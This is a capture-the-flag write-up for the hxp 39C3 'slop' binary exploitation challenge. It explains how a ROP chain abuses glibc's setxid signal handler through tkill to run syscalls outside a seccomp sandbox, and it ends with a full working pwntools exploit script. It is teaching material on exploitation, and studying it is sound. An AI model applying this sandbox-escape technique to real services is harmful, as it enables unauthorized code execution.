hxp 39C3 CTF: slop writeup
Although I did not attend 39C3, I played a bit the hxp CTF with
justCatTheFish team. I focused on the slop pwn challenge,
which we did not manage to finish in time, but we almost got it. I thought the
challenge was very cool, so I decided to finish it and post this writeup.
The challege files can be downloaded here. It’s a Linux user-space binary exploitation challenge. The binary is statically linked with the following mitigations:
$ pwn checksec ./slop
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
From the relevant files, we also get the source code (slop.c), a readflag
binary, and a Dockerfile. Because of how the permissions are set up in the
Dockerfile, we can’t read the /flag.txt directly and have to run the
/readflag program with the setgid bit, which prints the flag to stdout.
How slop works? #
The program listens on a TCP socket and handles the connection in another thread. This is what happens at a high level. First, the main thread:
- TCP socket is created and listens on port 1234, waits for one connection. After a client connects, continues to point 2.
- The
random_memoryfunction is called which allocates a new stack at a randomized address. The new stack is not effective yet, just allocated. I’m not sure why this is in the challenge. As it turns out, it’s not required to leak this address or explicitly use the new stack. - A new connection thread is started with the
handle_requestas the entrypoint. - Finally, the stack is switched to the address from point 2. and the program
goes into a tight infinite loop calling
sched_yieldrepetitively.
The connection thread does this:
- Reads 0x300 bytes from the socket straight into the thread’s stack. This
conveniently lands almost right at the return address
(
__builtin_frame_address(0)) and no canary leak is needed. - Installs a
seccomppolicy allowing only for syscalls:pause,nanosleep,alarm,getpid,exit,wait4,kill,getcwd,sysinfo,tkill,exit_group,waitid. Any other syscall called from this thread terminates the program. - If the return address is not overwritten,
handle_requestreturns to pthreads (start_thread) and crashes due to callingrt_sigprocmasksyscall which is not allowed.
From this behavior, we can deduce that we first need to take over the execution
of the connection thread with a ROP (there is a generous 0x300 bytes
budget) and from there somehow take over the execution of the main thread,
which is not sandboxed by seccomp. Then, call the /readflag binary, so that
it outputs flag to the socket. There are two issues here:
The main thread is stuck in this loop:
0x401a5d <main+269> mov eax, 0x18 0x401a62 <main+274> syscall <SYS_sched_yield> 0x401a64 <main+276> jmp main+269Even with full control over the memory from the connection thread’s ROP, we can’t break the loop. There needs to be another way of triggering execution in the main thread.
Simply calling
execveon/readflagwill print the flag to the stdout on the server and not to our connection. We need a way to redirect the stdout to the socket.
For the first issue, a natural solution is to trigger a signal handler which would run asynchronously in the context of the main thread. We can manipulate the memory it operates on from the connection thread and hopefully take over the execution.
For the second one, we need to call dup2 syscall but that requires code
execution in the main thread as this syscall is blocked by the seccomp
policy, so let’s take a look at signals first.
Finding signal handler #
The program doesn’t explicitly register any signal handlers and the seccomp
policy doesn’t allow that. This means we can’t simply register a handler and
then trigger it’s execution in the main thread. We need to find an already
registered signal handler and trigger it with one of the allowed syscalls.
Now, how to discover the signals handled by a process? We found the right
signal by trial and error, but we unfortunately lost a lot of time here. Only
after the CTF, I realised, that unless the handler is somehow magically set up
by the kernel, it has to show up in the strace. And indeed, the handler is
registred with rt_sigaction when the connection thread is spawned:
$ strace -e t='/.*sig.*' ./slop
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
rt_sigaction(SIGRT_1, {sa_handler=0x42e9f0, sa_mask=[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x41fc60}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, ~[], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
This action is registered by the pthreads library with signal
number 33 (SIGRT_1 aka SIGSETXID) and the handler function
__nptl_setxid_sighandler (0x42e9f0). For this
challenge, it is not necessary to know what it is legitimately used for, but it
runs code that is perfect for our exploitation:
/* Set by __nptl_setxid and used by __nptl_setxid_sighandler. */
static struct xid_command *xidcmd;
/* We use the SIGSETXID signal in the setuid, setgid, etc. implementations to
tell each thread to call the respective setxid syscall on itself. This is
the handler. */
void
__nptl_setxid_sighandler (int sig, siginfo_t *si, void *ctx)
{
int result;
/* Safety check. It would be possible to call this function for
other signals and send a signal from another process. This is not
correct and might even be a security problem. Try to catch as
many incorrect invocations as possible. */
if (sig != SIGSETXID
|| si->si_pid != __getpid ()
|| si->si_code != SI_TKILL)
return;
result = INTERNAL_SYSCALL_NCS (xidcmd->syscall_no, 3, xidcmd->id[0],
xidcmd->id[1], xidcmd->id[2]);
int error = 0;
if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (result)))
error = INTERNAL_SYSCALL_ERRNO (result);
setxid_error (xidcmd, error);
...
}This essentially means that we can call an arbitrary syscall by overwriting the
xidcmd pointer to a crafted xid_command structure before triggering the
handler. Here is how it looks like in the challenge:
0x42ea23 <__nptl_setxid_sighandler+51> mov rax, qword ptr [rip + 0x97746] RAX, [xidcmd]
0x42ea2a <__nptl_setxid_sighandler+58> mov rsi, qword ptr [rax + 0x10]
0x42ea2e <__nptl_setxid_sighandler+62> mov rdi, qword ptr [rax + 8]
0x42ea32 <__nptl_setxid_sighandler+66> mov rdx, qword ptr [rax + 0x18]
0x42ea36 <__nptl_setxid_sighandler+70> mov eax, dword ptr [rax]
0x42ea38 <__nptl_setxid_sighandler+72> syscall
The handler performs some prior safety checks, but we satisfy all of them:
- Signal number is
SIGSETXID(33) - this is always true. - Sent from the same PID - both threads share the same PID.
- Sent from
tkillsyscall - allowed byseccomp.
Gracefully returning from the handler allows us to make multiple syscalls. We
need to make sure xidcmd->error is set to 0, otherwise
setxid_error will abort the program.
Full exploit #
We have all the required pieces to construct the exploit, the ROP has to:
- Overwrite the
xidcmdpointer. - Set up a fake
xid_commandstructure to calldup2(4, 1)and calltkillto trigger it in the main thread. - Call
nanosleepto make sure the previous step finished. - Set up a fake
xid_commandstructure to callexecve("/readflag", 0, 0)and calltkillto trigger it in the main thread. - Call
pauseso the program doesn’t crash.
As a side note, I couldn’t find this gadget with ropper and pwntools, weird:
$ ROPgadget --binary ./slop | grep 'xchg edi'
0x000000000047a8c6 : xchg edi, eax ; ret
And finally, here is the full exploit code:
#!/usr/bin/env python3
from pwn import *
exe = context.binary = ELF(args.EXE or './slop')
def start(argv=[], *a, **kw):
port = 1024
if args.REMOTE:
return remote(args.HOST or 'localhost', port, *a, **kw)
else:
gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
sleep(1)
return remote('localhost', port, *a, **kw)
gdbscript = '''
continue
'''.format(**locals())
# ROP gadgets
pop_rax_ret = 0x4051bf
pop_rdi_ret = 0x402701
pop_rsi_ret = 0x405caf
mov_mem_rsi_rax_ret = 0x417f21 # mov qword ptr [rsi], rax; ret;
syscall_ret = 0x405972
xchg_edi_eax_ret = 0x47a8c6
# writable memory, nothing important there
fake_xidcmd = 0x4c1000
execve_path = fake_xidcmd + 0x100
def write_mem(where, what):
return [
pop_rsi_ret, where,
pop_rax_ret, what,
mov_mem_rsi_rax_ret
]
def syscall(syscall_nr, rdi=None, rsi=None):
return [
pop_rax_ret, syscall_nr,
[pop_rdi_ret, rdi] if rdi else [],
[pop_rsi_ret, rsi] if rsi else [],
syscall_ret
]
def tkill(syscall_nr, rdi, rsi, rdx=None):
return [
write_mem(fake_xidcmd, syscall_nr), # rax
write_mem(fake_xidcmd+0x8, rdi),
write_mem(fake_xidcmd+0x10, rsi),
write_mem(fake_xidcmd+0x18, rdx) if rdx else [],
write_mem(fake_xidcmd+0x24, 0), # xidcmd->error has to be 0
exe.sym['getpid'], # we can just call getpid from libc
xchg_edi_eax_ret,
syscall(constants.SYS_tkill,
None, # rdi already set with xchg
33) # SIGRT_1
]
rop = flat([
# 1
write_mem(exe.sym['xidcmd'], fake_xidcmd),
# 2
tkill(constants.SYS_dup2, 4, 1),
# 3
syscall(constants.SYS_nanosleep,
0x4bf128, # fake timespec - 1s wait
0),
# 4
write_mem(execve_path, u64(b'/readfla')),
write_mem(execve_path+8, u64(b'g'+b'\x00'*7)),
tkill(constants.SYS_execve, execve_path, 0, 0),
# 5
syscall(constants.SYS_pause)
])
io = start()
io.recvuntil(b'send me your slop:\n')
io.send(b'A'*8 + rop)
io.interactive()